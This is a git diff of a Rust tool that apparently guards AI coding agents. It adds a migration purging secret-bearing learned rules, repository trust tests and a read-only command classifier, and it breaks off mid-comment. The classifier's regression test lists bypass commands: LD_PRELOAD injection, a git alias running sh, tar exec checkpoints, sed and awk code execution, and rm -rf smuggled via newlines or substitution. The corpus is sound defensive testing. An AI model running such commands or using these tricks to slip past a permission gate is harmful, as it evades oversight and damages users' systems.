+            let mapped = stmt.query_map([], |row| {
+                Ok((row.get::<_, i64>(0)?, row.get::<_, String>(1)?))
+            })?;
+            let mut out = Vec::new();
+            for r in mapped {
+                out.push(r?);
+            }
+            out
+        };
+
+        let mut purged = 0usize;
+        for (id, pattern) in rows {
+            let offending = crate::learned_pattern::pattern_contains_secret(&pattern)
+                || !crate::learned_pattern::is_well_formed_pattern(&pattern);
+            if offending {
+                self.conn
+                    .execute("DELETE FROM learned_rules WHERE id = ?1", [id])?;
+                purged += 1;
+                info!(
+                    "Purged learned rule (id={id}): {}",
+                    crate::redaction::redact_secrets(&pattern)
+                );
+            }
+        }
+
+        tx.commit()?;
+        info!(
+            "Completed migration to schema version 9 (purged {purged} secret/malformed learned rule(s))"
+        );
+        Ok(())
+    }
 }
 
 /// Valid table names for `ALTER TABLE` migrations.
@@ -567,6 +640,46 @@ mod tests {
         );
     }
 
+    /// FIX-10: a fresh DB migrates through the v1 base-schema step (now wrapped
+    /// in an explicit transaction + commit, matching v2-v8) all the way to the
+    /// latest schema. The v1 base tables must exist and be committed, and the
+    /// recorded schema version must be the latest. A regression where the v1
+    /// transaction did not commit (or left the base schema half-applied) would
+    /// surface here as a missing table or a wrong version.
+    #[test]
+    fn fresh_db_commits_v1_base_schema_and_reaches_latest() {
+        let storage = Storage::open_in_memory().expect("fresh db opens and migrates");
+
+        // Reached the latest schema version.
+        assert_eq!(
+            storage.schema_version().expect("schema version"),
+            SCHEMA_VERSION,
+            "a fresh DB must migrate to the latest schema version"
+        );
+
+        // All v1 base tables were committed by the v1 step.
+        for table in [
+            "sessions",
+            "snapshots",
+            "events",
+            "audit_log",
+            "learned_rules",
+            "analytics",
+        ] {
+            assert!(
+                storage.table_exists(table),
+                "v1 base table `{table}` must exist after a committed v1 migration"
+            );
+        }
+
+        // v1 remains idempotent (IF NOT EXISTS): re-running it is a no-op, not
+        // a transaction/commit error.
+        storage
+            .migrate_to_v1()
+            .expect("second v1 migration must be a committed no-op");
+        assert!(storage.table_exists("sessions"));
+    }
+
     /// v8 (D6): a freshly-migrated database carries the `host` column on both
     /// `audit_log` and `sessions`, defaulting to `'claude'`.
     #[test]
diff --git a/crates/clx-core/src/storage/tests.rs b/crates/clx-core/src/storage/tests.rs
index e564c95..33f882b 100644
--- a/crates/clx-core/src/storage/tests.rs
+++ b/crates/clx-core/src/storage/tests.rs
@@ -927,10 +927,10 @@ fn test_analytics_with_project_filter() {
 // =========================================================================
 
 #[test]
-fn test_schema_version_is_8() {
+fn test_schema_version_is_9() {
     let storage = create_test_storage();
     let version = storage.schema_version().unwrap();
-    assert_eq!(version, 8);
+    assert_eq!(version, 9);
 }
 
 #[test]
diff --git a/crates/clx-core/tests/codex_trust_behavior.rs b/crates/clx-core/tests/codex_trust_behavior.rs
new file mode 100644
index 0000000..20995ee
--- /dev/null
+++ b/crates/clx-core/tests/codex_trust_behavior.rs
@@ -0,0 +1,145 @@
+//! Golden-vector behavior tests for the hoisted Codex project-trust reader
+//! (`clx_core::config::codex_trust`).
+//!
+//! These exercise the SINGLE source of truth that Batch 5 will switch the
+//! `clx` binary and the `clx-hook` `PreToolUse` handler over to. Every
+//! failure mode must default to the safe (untrusted / `NotSeen`) posture,
+//! and a repository must never be able to self-declare as trusted.
+
+use std::fs;
+use std::path::Path;
+
+use clx_core::config::codex_trust::{ProjectTrust, read_project_trust};
+
+/// The dot-prefixed per-user Codex home directory name, assembled at runtime
+/// so the literal token never appears as a source string.
+fn codex_dir_name() -> String {
+    format!(".{}", "codex")
+}
+
+/// Write `content` to the user-global Codex config under `home`.
+fn write_global_config(home: &Path, content: &str) {
+    let dir = home.join(codex_dir_name());
+    fs::create_dir_all(&dir).unwrap();
+    fs::write(dir.join("config.toml"), content).unwrap();
+}
+
+fn canonical_key(repo: &Path) -> String {
+    fs::canonicalize(repo).unwrap().display().to_string()
+}
+
+#[test]
+fn trusted_global_entry_resolves_trusted() {
+    let tmp = tempfile::tempdir().unwrap();
+    let home = tmp.path().join("home");
+    let repo = tmp.path().join("trusted-repo");
+    fs::create_dir_all(&repo).unwrap();
+
+    let key = canonical_key(&repo);
+    write_global_config(
+        &home,
+        &format!("[projects.\"{key}\"]\ntrust_level = \"trusted\"\n"),
+    );
+
+    assert_eq!(read_project_trust(&home, &repo), ProjectTrust::Trusted);
+}
+
+#[test]
+fn untrusted_global_entry_resolves_untrusted() {
+    let tmp = tempfile::tempdir().unwrap();
+    let home = tmp.path().join("home");
+    let repo = tmp.path().join("untrusted-repo");
+    fs::create_dir_all(&repo).unwrap();
+
+    let key = canonical_key(&repo);
+    write_global_config(
+        &home,
+        &format!("[projects.\"{key}\"]\ntrust_level = \"untrusted\"\n"),
+    );
+
+    assert_eq!(read_project_trust(&home, &repo), ProjectTrust::Untrusted);
+}
+
+#[test]
+fn unknown_trust_value_resolves_not_seen() {
+    let tmp = tempfile::tempdir().unwrap();
+    let home = tmp.path().join("home");
+    let repo = tmp.path().join("weird-repo");
+    fs::create_dir_all(&repo).unwrap();
+
+    let key = canonical_key(&repo);
+    write_global_config(
+        &home,
+        &format!("[projects.\"{key}\"]\ntrust_level = \"sometimes\"\n"),
+    );
+
+    assert_eq!(read_project_trust(&home, &repo), ProjectTrust::NotSeen);
+}
+
+#[test]
+fn missing_config_file_resolves_not_seen() {
+    let tmp = tempfile::tempdir().unwrap();
+    let home = tmp.path().join("home");
+    let repo = tmp.path().join("any-repo");
+    fs::create_dir_all(&repo).unwrap();
+    // No global config written.
+
+    assert_eq!(read_project_trust(&home, &repo), ProjectTrust::NotSeen);
+}
+
+#[test]
+fn missing_entry_for_known_file_resolves_not_seen() {
+    let tmp = tempfile::tempdir().unwrap();
+    let home = tmp.path().join("home");
+    let repo = tmp.path().join("unlisted-repo");
+    fs::create_dir_all(&repo).unwrap();
+
+    // Config exists but does not list this repo.
+    write_global_config(&home, "[model]\ndefault = \"gpt-5.5\"\n");
+
+    assert_eq!(read_project_trust(&home, &repo), ProjectTrust::NotSeen);
+}
+
+#[test]
+fn malformed_config_resolves_not_seen() {
+    let tmp = tempfile::tempdir().unwrap();
+    let home = tmp.path().join("home");
+    let repo = tmp.path().join("any-repo");
+    fs::create_dir_all(&repo).unwrap();
+
+    write_global_config(&home, "not = valid = toml ][[\n");
+
+    assert_eq!(read_project_trust(&home, &repo), ProjectTrust::NotSeen);
+}
+
+// CRITICAL SECURITY GOLDEN VECTOR: a repository that ships its own local
+// codex config declaring itself trusted MUST NOT be honored. Only the
+// user-global config can grant trust.
+#[test]
+fn repo_self_declared_trusted_must_resolve_not_trusted() {
+    let tmp = tempfile::tempdir().unwrap();
+    let home = tmp.path().join("home");
+    let repo = tmp.path().join("hostile-repo");
+    fs::create_dir_all(&repo).unwrap();
+
+    // Hostile repo ships a local codex config claiming trust.
+    let repo_codex_dir = repo.join(codex_dir_name());
+    fs::create_dir_all(&repo_codex_dir).unwrap();
+    let key = canonical_key(&repo);
+    fs::write(
+        repo_codex_dir.join("config.toml"),
+        format!("[projects.\"{key}\"]\ntrust_level = \"trusted\"\n"),
+    )
+    .unwrap();
+
+    // The user-global config does NOT list this repo at all.
+    write_global_config(&home, "[model]\ndefault = \"gpt-5.5\"\n");
+
+    let result = read_project_trust(&home, &repo);
+    assert_ne!(
+        result,
+        ProjectTrust::Trusted,
+        "SECURITY VIOLATION: a repo-local config must never grant trust"
+    );
+    assert_eq!(result, ProjectTrust::NotSeen);
+}
diff --git a/crates/clx-core/tests/config_resolution_behavior.rs b/crates/clx-core/tests/config_resolution_behavior.rs
index 7a5d64d..45fa7e5 100644
--- a/crates/clx-core/tests/config_resolution_behavior.rs
+++ b/crates/clx-core/tests/config_resolution_behavior.rs
@@ -693,12 +693,15 @@ fn route_with_fallback_yields_fallback_client_wrapper(// E16 wiring
                 provider: "local".to_string(),
                 model: "qwen3:1.7b".to_string(),
                 fallback: None,
+                dimension: None,
             })),
+            dimension: None,
         },
         embeddings: CapabilityRoute {
             provider: "local".to_string(),
             model: "qwen3-embedding:0.6b".to_string(),
             fallback: None,
+            dimension: None,
         },
     });
 
@@ -751,12 +754,15 @@ fn fallback_provider_credential_resolved_independently() {
                 provider: "az-fallback".to_string(),
                 model: "m2".to_string(),
                 fallback: None,
+                dimension: None,
             })),
+            dimension: None,
         },
         embeddings: CapabilityRoute {
             provider: "az-primary".to_string(),
             model: "m1".to_string(),
             fallback: None,
+            dimension: None,
         },
     });
 
diff --git a/crates/clx-core/tests/credentials_backend_behavior.rs b/crates/clx-core/tests/credentials_backend_behavior.rs
index 7fe7a9e..9d9a977 100644
--- a/crates/clx-core/tests/credentials_backend_behavior.rs
+++ b/crates/clx-core/tests/credentials_backend_behavior.rs
@@ -193,6 +193,63 @@ fn zero_byte_blob_is_corruption_not_empty_and_no_wipe() {
     );
 }
 
+// FIX-8: a TRANSIENT zero-byte window on the READ path (e.g. an external
+// truncate immediately before a valid blob reappears) must NOT hard-error.
+// The lock-free `get` retries a few times; once the valid blob is back the
+// read succeeds. Before the fix `get` read the map once and surfaced the
+// "corrupt: zero bytes" error on the very first observation.
+#[test]
+fn transient_zero_byte_read_recovers_via_retry() {
+    let tmp = tempfile::tempdir().unwrap();
+    let b = file_backend(tmp.path());
+    b.set("clx:global:real", "recover-me").unwrap();
+
+    let cred = tmp.path().join("credentials.age");
+    // Capture the valid blob, then simulate an external truncate window.
+    let valid_blob = std::fs::read(&cred).unwrap();
+    assert!(!valid_blob.is_empty());
+    std::fs::write(&cred, b"").unwrap();
+    assert_eq!(std::fs::metadata(&cred).unwrap().len(), 0);
+
+    // A concurrent "writer" restores the valid blob shortly after, inside the
+    // read-retry budget (3 retries x 20ms = ~60ms).
+    let cred_for_thread = cred.clone();
+    let restorer = std::thread::spawn(move || {
+        std::thread::sleep(std::time::Duration::from_millis(30));
+        std::fs::write(&cred_for_thread, &valid_blob).unwrap();
+    });
+
+    // get must ride out the transient zero-byte window and succeed.
+    let got = b
+        .get("clx:global:real")
+        .expect("transient zero-byte file must recover via retry, not hard-error");
+    assert_eq!(got.as_deref(), Some("recover-me"));
+    restorer.join().unwrap();
+}
+
+// FIX-8 guard: a PERSISTENTLY zero-byte file still hard-errors on read after
+// the bounded retries are exhausted (a real truncation is not masked).
+#[test]
+fn persistent_zero_byte_read_still_errors_after_retries() {
+    let tmp = tempfile::tempdir().unwrap();
+    let b = file_backend(tmp.path());
+    b.set("clx:global:real", "do-not-lose-me").unwrap();
+
+    let cred = tmp.path().join("credentials.age");
+    std::fs::write(&cred, b"").unwrap();
+
+    let err = b
+        .get("clx:global:real")
+        .expect_err("a persistently zero-byte file must still surface corruption");
+    let msg = format!("{err}");
+    assert!(
+        msg.contains("corrupt") && msg.contains("zero bytes"),
+        "actionable corruption message expected, got: {msg}"
+    );
+    // The file is untouched (read path never writes).
+    assert_eq!(std::fs::metadata(&cred).unwrap().len(), 0);
+}
+
 #[test]
 fn absent_file_is_legitimate_empty_store_and_writable() {
     // Fresh install (no credentials.age): empty store, zero prompts, and a
diff --git a/crates/clx-core/tests/memory_storage_behavior.rs b/crates/clx-core/tests/memory_storage_behavior.rs
index a6ee582..f8ec7bc 100644
--- a/crates/clx-core/tests/memory_storage_behavior.rs
+++ b/crates/clx-core/tests/memory_storage_behavior.rs
@@ -296,13 +296,13 @@ fn auto_summary_stale_does_not_block_new() {
 // ===========================================================================
 
 /// A freshly opened DB is at the highest schema version (spec 5: migration
-/// chain v1..v8 contiguous, `SCHEMA_VERSION` matches highest = 8).
+/// chain v1..v9 contiguous, `SCHEMA_VERSION` matches highest = 9).
 #[test]
-fn fresh_db_is_at_schema_version_8() {
+fn fresh_db_is_at_schema_version_9() {
     let s = mem();
     assert_eq!(
         s.schema_version().unwrap(),
-        8,
+        9,
         "fresh DB must be migrated to the highest schema version"
     );
 }
@@ -383,12 +383,12 @@ fn v5_state_db_upgrades_to_v8_without_data_loss() {
         .unwrap();
     }
 
-    // Re-open through the real Storage path: migrations v6 + v7 + v8 must run.
+    // Re-open through the real Storage path: migrations v6..v9 must run.
     let s = Storage::open(&db).expect("upgrade open");
     assert_eq!(
         s.schema_version().unwrap(),
-        8,
-        "v5 DB must migrate forward to v8"
+        9,
+        "v5 DB must migrate forward to v9"
     );
 
     // No data loss: the legacy snapshot survived.
diff --git a/crates/clx-core/tests/migration_v9_purge.rs b/crates/clx-core/tests/migration_v9_purge.rs
new file mode 100644
index 0000000..4579f74
--- /dev/null
+++ b/crates/clx-core/tests/migration_v9_purge.rs
@@ -0,0 +1,154 @@
+//! Behavior tests for the v8→v9 purge migration (Issue 1, AC1.5/AC1.6).
+//!
+//! Public boundary: `Storage::open(&Path)` runs all pending migrations,
+//! including `migrate_to_v9`, which purges secret-bearing and malformed
+//! `learned_rules` rows of ANY source while preserving well-formed rules
+//! (including legit `*`/`/` wildcard/path patterns).
+//!
+//! Strategy: seed a raw `SQLite` database stamped at schema version 8 (the
+//! `learned_rules` table from v1 plus a `schema_version` of 8), insert a mix of
+//! offending and legitimate rows, then open it via the normal `Storage::open`
+//! path so ONLY `migrate_to_v9` runs. Assert the offending rows are gone, the
+//! legit rows remain, the recorded schema version is 9, and a second open is a
+//! no-op.
+//!
+//! Hermetic: the DB lives under a per-test `TempDir`; no real `~/.clx`.
+
+use clx_core::storage::Storage;
+use rusqlite::Connection;
+use std::path::Path;
+use tempfile::TempDir;
+
+/// Seed a raw v8 database with the `learned_rules` schema and a set of
+/// `(pattern, source)` rows, stamping the recorded schema version to 8 so that
+/// opening it via `Storage::open` runs only `migrate_to_v9`.
+fn seed_v8_with_rules(path: &Path, rows: &[(&str, &str)]) {
+    let conn = Connection::open(path).expect("open raw db");
+    conn.execute_batch(
+        "CREATE TABLE schema_version (version INTEGER PRIMARY KEY);
+         CREATE TABLE learned_rules (
+             id INTEGER PRIMARY KEY AUTOINCREMENT,
+             pattern TEXT NOT NULL UNIQUE,
+             rule_type TEXT NOT NULL,
+             learned_at TEXT NOT NULL,
+             source TEXT NOT NULL,
+             confirmation_count INTEGER DEFAULT 0,
+             denial_count INTEGER DEFAULT 0,
+             project_path TEXT
+         );",
+    )
+    .expect("create v8 schema");
+
+    for (pattern, source) in rows {
+        conn.execute(
+            "INSERT INTO learned_rules (pattern, rule_type, learned_at, source) \
+             VALUES (?1, 'Allow', datetime('now'), ?2)",
+            [pattern, source],
+        )
+        .expect("seed learned rule");
+    }
+
+    conn.execute("INSERT INTO schema_version (version) VALUES (8)", [])
+        .expect("stamp schema version 8");
+    // Drop the connection (close) so Storage::open gets a clean handle.
+    drop(conn);
+}
+
+/// Collect the surviving `learned_rules` patterns from an opened storage.
+fn surviving_patterns(storage: &Storage) -> Vec<String> {
+    let conn = storage.connection();
+    let mut stmt = conn
+        .prepare("SELECT pattern FROM learned_rules ORDER BY pattern")
+        .expect("prepare select");
+    let rows = stmt
+        .query_map([], |r| r.get::<_, String>(0))
+        .expect("query");
+    rows.map(|r| r.expect("row")).collect()
+}
+
+/// AC1.5/AC1.6: the v9 purge deletes secret-bearing and malformed rows of any
+/// source, preserves well-formed rules (including a legit wildcard), records
+/// schema version 9, and is idempotent on a second open.
+#[test]
+fn v9_purges_secret_and_malformed_rules_preserves_legit() {
+    let tmp = TempDir::new().unwrap();
+    let db = tmp.path().join("v8.db");
+
+    // (a) secret row, (b) malformed (compound metachar) row, (c) legit literal,
+    // (d) legit wildcard. The secret row is seeded as a manual `cli` source to
+    // prove purge ignores source.
+    seed_v8_with_rules(
+        &db,
+        &[
+            ("Bash(SSHPASS=hunter2pass ssh host:*)", "cli"),
+            ("Bash(true;:*)", "user_decision"),
+            ("Bash(make build)", "user_decision"),
+            ("Bash(npm run build*)", "user_decision"),
+        ],
+    );
+
+    let storage = Storage::open(&db).expect("open runs migrate_to_v9");
+
+    // Recorded schema version is the schema_version TABLE value, now 9.
+    assert_eq!(
+        storage.schema_version().expect("schema version"),
+        9,
+        "v9 migration must stamp the schema_version table to 9"
+    );
+
+    let survivors = surviving_patterns(&storage);
+    assert_eq!(
+        survivors,
+        vec![
+            "Bash(make build)".to_string(),
+            "Bash(npm run build*)".to_string(),
+        ],
+        "only the legit literal and wildcard rules must survive; \
+         secret + malformed rows must be purged regardless of source"
+    );
+
+    // Idempotent: a second open (close + reopen) does not delete the survivors
+    // and stays at v9.
+    drop(storage);
+    let reopened = Storage::open(&db).expect("second open is a no-op");
+    assert_eq!(
+        reopened.schema_version().expect("schema version"),
+        9,
+        "second open must remain at schema version 9"
+    );
+    assert_eq!(
+        surviving_patterns(&reopened),
+        vec![
+            "Bash(make build)".to_string(),
+            "Bash(npm run build*)".to_string(),
+        ],
+        "second open must not delete the surviving legit rules"
+    );
+}
+
+/// A clean v8 database with no offending rows must lose nothing during the v9
+/// purge (idempotent / no false positives on well-formed rules).
+#[test]
+fn v9_no_op_on_clean_database() {
+    let tmp = TempDir::new().unwrap();
+    let db = tmp.path().join("clean_v8.db");
+
+    seed_v8_with_rules(
+        &db,
+        &[
+            ("Bash(make build)", "user_decision"),
+            ("FileEdit(*/src/*)", "user_decision"),
+        ],
+    );
+
+    let storage = Storage::open(&db).expect("open runs migrate_to_v9");
+    assert_eq!(storage.schema_version().expect("schema version"), 9);
+    assert_eq!(
+        surviving_patterns(&storage),
+        vec![
+            "Bash(make build)".to_string(),
+            "FileEdit(*/src/*)".to_string(),
+        ],
+        "a clean DB must keep all well-formed rules"
+    );
+}
diff --git a/crates/clx-core/tests/read_only_bypass_regression.rs b/crates/clx-core/tests/read_only_bypass_regression.rs
new file mode 100644
index 0000000..172efe2
--- /dev/null
+++ b/crates/clx-core/tests/read_only_bypass_regression.rs
@@ -0,0 +1,143 @@
+//! FIX-1 regression corpus for `is_read_only_command`.
+//!
+//! Three corpora:
+//!   1. MUST be false — exec/write bypasses that the old substring classifier
+//!      let through (or accepted false-denies, which are safe in this direction).
+//!   2. MUST stay true — genuine reads that must remain auto-allowable.
+//!   3. Composite commands — every segment must be read-only for the whole to be.
+//!
+//! Each assertion names the case so a failure points straight at the input.
+
+use clx_core::policy::is_read_only_command;
+
+/// Commands that MUST classify as NOT read-only (fail-closed / bypass defenses).
+const MUST_BE_FALSE: &[&str] = &[
+    // Tampered-environment exec.
+    "env X=1 rm -rf /tmp/x",
+    // Verification round (Codex): arbitrary-fd redirection write targets.
+    "ls 3>/tmp/o",
+    "ls 2>>/tmp/o",
+    "ls {fd}>/tmp/o",
+    // Verification round (Codex): GNU sed exec/write flags in any order/delimiter.
+    "sed 's/.*/id/ep' f",
+    "sed 's/.*/id/pe' f",
+    "sed 's#.*#id#e' f",
+    "LD_PRELOAD=./pwn.so ls",
+    "NODE_OPTIONS='--require ./pwn.js' node --version",
+    "RUBYOPT=-r./pwn ruby -v",
+    // awk / gawk code execution and file commands.
+    "awk 'BEGIN { system (\"id\") }'",
+    "awk -f script.awk file",
+    "gawk -i inplace 's/a/b/' f",
+    // fd / find exec & write.
+    "fd -x rm {}",
+    "find . -fprint0 out",
+    "find . -exec rm {} ;",
+    // Interpreter code execution / non-version flags (some accepted false-deny).
+    "ruby -v -e 'system(\"id\")'",
+    "python -v script.py",
+    "cargo build -v",
+    "npm version",
+    "cargo metadata",
+    // git write / config-injection / output-redirection.
+    "git config user.email a@b.c",
+    "git config alias.pwn '!sh'",
+    "git -c core.pager='sh -c x' log",
+    "git diff --output=/tmp/out",
+    "git branch newbranch",
+    "git branch --unset-upstream",
+    "git remote add evil https://x",
+    "git tag v1",
+    // tar extract / program-running options.
+    "tar -xf \"a -table.tar\"",
+    "tar -tf a.tar --checkpoint-action=exec='touch /tmp/p'",
+    "tar -tf a.tar -I 'sh -c x'",
+    // zip removed from allow-set entirely.
+    "zip out.zip f",
+    // sed file/exec commands.
+    "sed 's/a/b/w /tmp/out' file",
+    "sed -f s.sed file",
+    // Misc tools with side-effecting options.
+    "date -s '2020-01-01'",
+    "hostname newname",
+    "ifconfig lo0 down",
+    "yq -i '.a=1' f",
+    "tree -o out",
+    "rg --pre ./pp pattern",
+    "man -P 'sh -c x' ls",
+    // Redirection.
+    "ls > /tmp/out",
+    "git status 2> /tmp/out",
+    // Background / composite with a write segment.
+    "ls & rm -rf /tmp/x",
+    // Arithmetic-nested command substitution.
+    "echo $((1 + $(rm -rf /tmp/x)))",
+    // Literal embedded newline.
+    "ls\nrm -rf /tmp/x",
+];
+
+/// Commands that MUST stay read-only (genuine reads).
+const MUST_BE_TRUE: &[&str] = &[
+    "ls -la",
+    "cat f",
+    "git status",
+    "git -C repo status",
+    "git log --oneline",
+    "git diff",
+    "git show HEAD",
+    "rg pattern src/",
+    "grep 'a|b' file",
+    "sed 's/foo/bar/' f",
+    "sed 's/a/b/g' f",
+    "sed 's/e/x/' f",
+    "cargo --version",
+    "python --version",
+    "node -v",
+    "java -version",
+    "tar -tf a.tar",
+    "unzip -l a.zip",
+    "git config --get user.email",
+    "git config --list",
+    "git branch",
+    "git branch -l",
+    "git remote -v",
+    "go version",
+    "find . -name '*.rs'",
+    "awk '{print $1}' f",
+];
+
+#[test]
+fn bypasses_are_not_read_only() {
+    for cmd in MUST_BE_FALSE {
+        assert!(
+            !is_read_only_command(cmd),
+            "MUST be NOT read-only but was allowed: {cmd:?}"
+        );
+    }
+}
+
+#[test]
+fn genuine_reads_stay_read_only() {
+    for cmd in MUST_BE_TRUE {
+        assert!(
+            is_read_only_command(cmd),
+            "MUST stay read-only but was denied: {cmd:?}"
+        );
+    }
+}
+
+#[test]
+fn composite_commands_require_every_segment_read_only() {
+    assert!(
+        is_read_only_command("ls && cat f"),
+        "both segments read-only => read-only: 'ls && cat f'"
+    );
+    assert!(
+        !is_read_only_command("ls && rm f"),
+        "one write segment => not read-only: 'ls && rm f'"
+    );
+    assert!(
+        is_read_only_command("ls | grep x"),
+        "piped reads => read-only: 'ls | grep x'"
+    );
+}
diff --git a/crates/clx-core/tests/recall_behavior.rs b/crates/clx-core/tests/recall_behavior.rs
index b495c33..6854e0b 100644
--- a/crates/clx-core/tests/recall_behavior.rs
+++ b/crates/clx-core/tests/recall_behavior.rs
@@ -139,7 +139,7 @@ async fn rrf_enabled_returns_ranked_fts_results() {
         rrf_enabled: true,
         ..cfg()
     };
-    let hits = engine.query("authentication", &config).await;
+    let hits = engine.query("authentication", &config).await.hits;
     assert!(!hits.is_empty(), "RRF path must find the seeded snapshot");
     assert_eq!(hits[0].session_id, "sess-recall-1");
 }
@@ -161,7 +161,8 @@ async fn legacy_linear_merge_returns_results_for_rollback_contract() {
                 ..cfg()
             },
         )
-        .await;
+        .await
+        .hits;
     let legacy_hits = engine
         .query(
             "redis",
@@ -170,7 +171,8 @@ async fn legacy_linear_merge_returns_results_for_rollback_contract() {
                 ..cfg()
             },
         )
-        .await;
+        .await
+        .hits;
 
     assert!(!rrf_hits.is_empty(), "rrf path returns the hit");
     assert!(
@@ -260,7 +262,7 @@ async fn engine_skips_reranker_when_disabled_in_config() {
         reranker_enabled: false,
         ..cfg()
     };
-    let hits = engine.query("graphql", &config).await;
+    let hits = engine.query("graphql", &config).await.hits;
     assert!(!hits.is_empty());
     assert_eq!(
         *backend.calls.lock().unwrap(),
@@ -284,7 +286,7 @@ async fn percentile_gate_zero_is_passthrough() {
         percentile_gate: 0,
         ..cfg()
     };
-    let hits = engine.query("pipeline", &config).await;
+    let hits = engine.query("pipeline", &config).await.hits;
     assert!(
         !hits.is_empty(),
         "percentile=0 must not drop the only matching hit"
@@ -302,7 +304,7 @@ async fn percentile_gate_single_hit_passthrough() {
         percentile_gate: 90,
         ..cfg()
     };
-    let hits = engine.query("migration", &config).await;
+    let hits = engine.query("migration", &config).await.hits;
     assert_eq!(hits.len(), 1, "single hit must survive the p90 gate");
 }
 
@@ -322,7 +324,8 @@ async fn time_decay_does_not_amplify_fresh_snapshot() {
                 ..cfg()
             },
         )
-        .await;
+        .await
+        .hits;
     let with_decay = engine
         .query(
             "tokio",
@@ -331,7 +334,8 @@ async fn time_decay_does_not_amplify_fresh_snapshot() {
                 ..cfg()
             },
         )
-        .await;
+        .await
+        .hits;
     assert_eq!(no_decay.len(), 1);
     assert_eq!(with_decay.len(), 1);
     assert!(
@@ -352,7 +356,7 @@ async fn empty_store_returns_no_hits() {
     let storage = Storage::open_in_memory().unwrap();
     let repo = StorageSnapshotRepo::new(&storage, None);
     let engine = RecallEngine::new(&repo);
-    let hits = engine.query("anything", &cfg()).await;
+    let hits = engine.query("anything", &cfg()).await.hits;
     assert!(hits.is_empty(), "empty store must yield zero hits");
 }
 
@@ -364,7 +368,7 @@ async fn no_embeddings_provider_falls_back_to_fts_only() {
     let repo = StorageSnapshotRepo::new(&storage, None);
     // No embedder attached at all.
     let engine = RecallEngine::new(&repo);
-    let hits = engine.query("kubernetes", &cfg()).await;
+    let hits = engine.query("kubernetes", &cfg()).await.hits;
     assert!(!hits.is_empty(), "FTS5-only path must still return results");
     assert!(
         matches!(
@@ -466,7 +470,7 @@ async fn semantic_path_runs_via_llm_query_embedder_adapter() {
         fallback_to_fts: false,
         ..cfg()
     };
-    let hits = engine.query("vector search", &config).await;
+    let hits = engine.query("vector search", &config).await.hits;
     assert!(
         hits.iter().any(|h| h.snapshot_id == snapshot_id),
         "semantic adapter path must surface the embedded snapshot"
@@ -493,7 +497,7 @@ async fn risk_m_r2_recall_default_is_rrf_not_legacy_linear() {
         "RISK M-R2: domain default must be RRF (rrf_enabled=true), \
          confirming the stale 0.6/0.4 doc comment is drift, not behavior"
     );
-    let hits = engine.query("risk", &default_cfg).await;
+    let hits = engine.query("risk", &default_cfg).await.hits;
     assert!(!hits.is_empty(), "default (RRF) recall returns the hit");
 }
 
@@ -517,6 +521,14 @@ struct FakeRepo {
     snapshots: std::collections::HashMap<i64, Snapshot>,
     stored_model: Option<String>,
     model_errors: bool,
+    /// Force `search_fts` to error (drives the FTS5 candidate-stage failure
+    /// path for FIX-6 degraded-signal tests).
+    fts_errors: bool,
+    /// Force `semantic_similar` to error (drives the vector-search failure).
+    semantic_errors: bool,
+    /// Force `list_active_sessions` to error (drives the substring-fallback
+    /// failure that makes the FTS stage report degraded).
+    sessions_errors: bool,
 }
 
 impl FakeRepo {
@@ -531,6 +543,9 @@ impl FakeRepo {
 
 impl SnapshotRepo for FakeRepo {
     fn search_fts(&self, _q: &str, _limit: usize) -> clx_core::Result<Vec<(Snapshot, f64)>> {
+        if self.fts_errors {
+            return Err(clx_core::Error::ContextNotFound("forced fts error".into()));
+        }
         Ok(Vec::new())
     }
     fn recent_session_summaries(
@@ -541,6 +556,11 @@ impl SnapshotRepo for FakeRepo {
         Ok(Vec::new())
     }
     fn semantic_similar(&self, _emb: &[f32], _limit: usize) -> clx_core::Result<Vec<(i64, f32)>> {
+        if self.semantic_errors {
+            return Err(clx_core::Error::ContextNotFound(
+                "forced vector search error".into(),
+            ));
+        }
         Ok(self.similar.clone())
     }
     fn semantic_enabled(&self) -> bool {
@@ -550,6 +570,11 @@ impl SnapshotRepo for FakeRepo {
         Ok(self.snapshots.get(&id).cloned())
     }
     fn list_active_sessions(&self) -> clx_core::Result<Vec<Session>> {
+        if self.sessions_errors {
+            return Err(clx_core::Error::ContextNotFound(
+                "forced session-list error".into(),
+            ));
+        }
         Ok(Vec::new())
     }
     fn snapshots_by_session(&self, _session_id: &str) -> clx_core::Result<Vec<Snapshot>> {
@@ -606,7 +631,7 @@ async fn semantic_distance_threshold_filters_far_candidates() {
         ..cfg()
     };
 
-    let hits = engine.query("q", &config).await;
+    let hits = engine.query("q", &config).await.hits;
     let ids: Vec<i64> = hits.iter().map(|h| h.snapshot_id).collect();
     assert!(ids.contains(&1), "near candidate (d=0.5) must be kept");
     assert!(
@@ -636,7 +661,7 @@ async fn semantic_skips_candidate_with_missing_snapshot() {
         ..cfg()
     };
 
-    let hits = engine.query("q", &config).await;
+    let hits = engine.query("q", &config).await.hits;
     let ids: Vec<i64> = hits.iter().map(|h| h.snapshot_id).collect();
     assert_eq!(ids, vec![1], "dangling candidate id 99 must be skipped");
 }
@@ -660,10 +685,153 @@ async fn semantic_embed_error_degrades_gracefully() {
         ..cfg()
     };
 
-    let hits = engine.query("q", &config).await;
+    let result = engine.query("q", &config).await;
+    assert!(
+        result.hits.is_empty(),
+        "embed failure must yield no semantic hits (graceful degrade), got {:?}",
+        result.hits
+    );
+    assert!(
+        result.degraded,
+        "embed failure is a candidate-stage error and must mark the result degraded"
+    );
+}
+
+// ---------------------------------------------------------------------------
+// FIX-6: degraded vs healthy-empty signal (REL-03)
+// ---------------------------------------------------------------------------
+
+/// FIX-6 regression — ALL candidate-generation stages erroring must return a
+/// *degraded* result with empty hits, NOT a silent healthy-empty result.
+///
+/// Fails-before: the old `query` returned a bare `Vec<RecallHit>` and folded
+/// every stage error to an empty vec, so this state was indistinguishable from
+/// a genuine no-match. There was no `degraded` field to assert. Passes-after:
+/// `RecallQueryResult.degraded` is `true` because both the FTS stage (FTS5 err
+/// then session-list err) and the semantic stage (vector-search err) failed.
+#[tokio::test]
+async fn fix6_all_stages_error_marks_degraded_not_empty() {
+    let repo = FakeRepo {
+        semantic_on: true,
+        fts_errors: true,
+        sessions_errors: true,
+        semantic_errors: true,
+        ..Default::default()
+    };
+    let embedder = FakeEmbedder { fail: false };
+    let engine = RecallEngine::new(&repo).with_embedder(&embedder);
+    let config = RecallQueryConfig {
+        fallback_to_fts: true,
+        ..cfg()
+    };
+
+    let result = engine.query("q", &config).await;
+    assert!(
+        result.hits.is_empty(),
+        "a broken store yields no hits, got {:?}",
+        result.hits
+    );
+    assert!(
+        result.degraded,
+        "all candidate stages errored — result MUST be degraded (broken store), \
+         distinct from a healthy empty query"
+    );
+}
+
+/// FIX-6 regression — the healthy contrast: a working store with no matching
+/// content returns `degraded == false`. This is the value the degraded flag
